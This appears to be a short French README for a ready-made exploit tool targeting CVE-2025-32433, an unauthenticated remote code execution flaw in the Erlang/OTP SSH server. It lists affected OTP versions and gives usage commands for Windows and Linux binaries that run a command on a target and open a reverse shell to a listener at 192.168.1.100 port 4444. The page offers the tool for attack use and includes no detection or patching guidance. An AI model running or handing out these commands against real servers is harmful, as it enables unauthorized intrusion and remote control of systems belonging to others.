
CVE-2025-32433 Erlang/OTP SSH RCE Exploit Exploit de vulnérabilité d'exécution de code à distance SSH
Une vulnérabilité grave a été identifiée dans le serveur SSH Erlang/OTP qui peut permettre à un attaquant d'effectuer une exécution de code à distance (RCE) sans authentification. En exploitant une faille dans le traitement des messages du protocole SSH, un acteur malveillant pourrait obtenir un accès non autorisé aux systèmes affectés et exécuter des commandes arbitraires sans informations d'identification valides. Cela pourrait entraîner la compromission desdits hôtes, permettant un accès non autorisé à des données sensibles et leur manipulation par des tiers, ou des attaques par déni de service.
OTP-27.3.2 et versions antérieures
OTP-26.2.5.10 et versions antérieures
OTP-25.3.2.19 et versions antérieures
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
